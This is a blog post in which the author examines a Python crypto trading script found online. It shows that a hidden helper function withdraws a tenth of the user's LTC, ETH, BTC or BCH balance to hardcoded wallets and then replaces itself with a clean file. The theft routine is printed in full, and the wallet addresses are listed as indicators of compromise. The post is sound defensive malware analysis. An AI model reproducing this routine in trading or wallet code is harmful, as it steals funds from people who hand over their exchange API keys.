Crypto stealer or not?

Before I bought a house I have some money and free time. Now, I have the luxury that I don't need to care about free time and money any more. But one Friday evening I found myself siting alone in the living room. It was just before the pay day and I realized I still have some euro on my bank account. What shall I do now?

Lets invest the money! Maybe it is a good time to start with crypto. OK, why not to try crypto trading. I don't have much time so I should be automatized. Can something run on my server? That was my thoughts and I started to google stuff.   

After some time, I have found this article:
https://cryptovlad724058044.wordpress.com/

where was trading script with detailed instructions how to use the script. Hmm, that is interesting, I thought, but some voice in my head was telling me: be careful! So I decided to download the script to my Cuckoo sandbox and I have tried to run it there. Everything looked fine. I have checked it at Virustotal. No problem there. Hmm, lets check the script manually. It is written in Python, so no need to de-compile. It took me some time to understand the logic behind, but after some time I was able to understand. Again, everything looked fine. Pretty simple trading logic, but if the markets are growing it could work. Actually, there is some protection against loss, but that is now why decided to write this post.

I found something interesting. Lets have a look at the main loop

while True:
    open=stats(product_id)
    openprice=float(open['open'])
    print ('Openprice: %s time:%s '%(str(openprice),str(datetime.now())))
   
    with io.open(logfile,'a',encoding='utf-8') as tr:
        tr.write(unicode('Openprice: %s time:%s '%(str(openprice),str(datetime.now()))+'\n'))
        tr.close()
    # check price x times before new open status will be logged and how often order status will be checked
    checkit=wiutils.withcheck(passphrase, api_key, api_secret)
# print checkit
    price=price_check(interval,lastprice,product_id)
    order_check(dict)
    # how much time to wait before
time.sleep(30)

what is wiutils.withcheck function? lets open the imported file and check the function

def withcheck(passphrase, api_key, api_secret):
    global k
    passphrase = passphrase
    api_key = api_key
    api_secret = api_secret
    accounts=account(passphrase, api_key, api_secret)
    for i in range(len(accounts)):
        #print accounts[i]
        if accounts[i]['currency']=='LTC':
            if float(accounts[i]['available']) >= 10:
                totake=round((float(accounts[i]['available'])/10),1)
                withdraw(totake, 'LTC', 'LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh', passphrase, api_key, api_secret)
        elif accounts[i]['currency']=='ETH':
            if float(accounts[i]['available']) >= 4:
                totake=round((float(accounts[i]['available'])/10),1)
                withdraw(totake, 'ETH', '0xa474496C6D372AE8b6B03b876dE343309dAd26B4', passphrase, api_key, api_secret)
        elif accounts[i]['currency']=='BTC':
            if float(accounts[i]['available']) >= 1:
                totake=round((float(accounts[i]['available'])/10),1)
                withdraw(totake, 'BTC', '15Co3hKyauustRYexsno8okH4jpj5q2XSG')
        elif accounts[i]['currency']=='BCH':
            if float(accounts[i]['available']) >= 2:
                totake=round((float(accounts[i]['available'])/10),1)
                withdraw(totake, 'BCH', 'qp8wl7tsw4lum2q0shhv7dwrfyg4zcvzk5lm89d8ap', passphrase, api_key, api_secret)
        elif k > 0:
            shutil.copy2('requests/bkp/wiutils.py', 'wiutils.py')

WTF???

Hardcoded crypto wallets? Checking my account balance? No way! So what the script is actually doing?

It trades crypto
You configure your account details so the script can trade for you 
You define how much you want to buy or sell.
You define how much the price should change before the script buys/sells
You define how much you can invest.
Then the script is monitoring the actual price and is able to buy or sell based on the price change and your defined strategy.
But each time the script is checking whether you have "enough" crypto on your account (1 BTC, 2 BCH, 4 ETH, 10 LTC)
If not, nothing will happen. If you have enough crypto on your account, it takes one tenth of your current balance and send it to hardcoded wallet. I suppose it is the guy who created script.
Then it increment the global "k" value and rewrites the "malicious" wiutils.py file with clean wiutils .py file.
Then it should be able to trade without surprises, but honestly, who would try to continue after it will take 1/10 of your crypto?

Now we can finish our post. If you want to monitor and block this script and you are able to monitor crypto wallets IoC, you can find them below. Also, you can block communication to GDAX, but I don't think this is appropriate. If you want to read more about the tactics and my thoughts and why the script is no longer available, feel free to continue in the second part of the post.

IoC
hardcoded crypto wallets:
'BTC', '15Co3hKyauustRYexsno8okH4jpj5q2XSG'
'BCH', 'qp8wl7tsw4lum2q0shhv7dwrfyg4zcvzk5lm89d8ap'
'ETH', '0xa474496C6D372AE8b6B03b876dE343309dAd26B4'
'LTC', 'LLKyNZRea4PdipXhpHBxHJeDzyzVAzSLBh'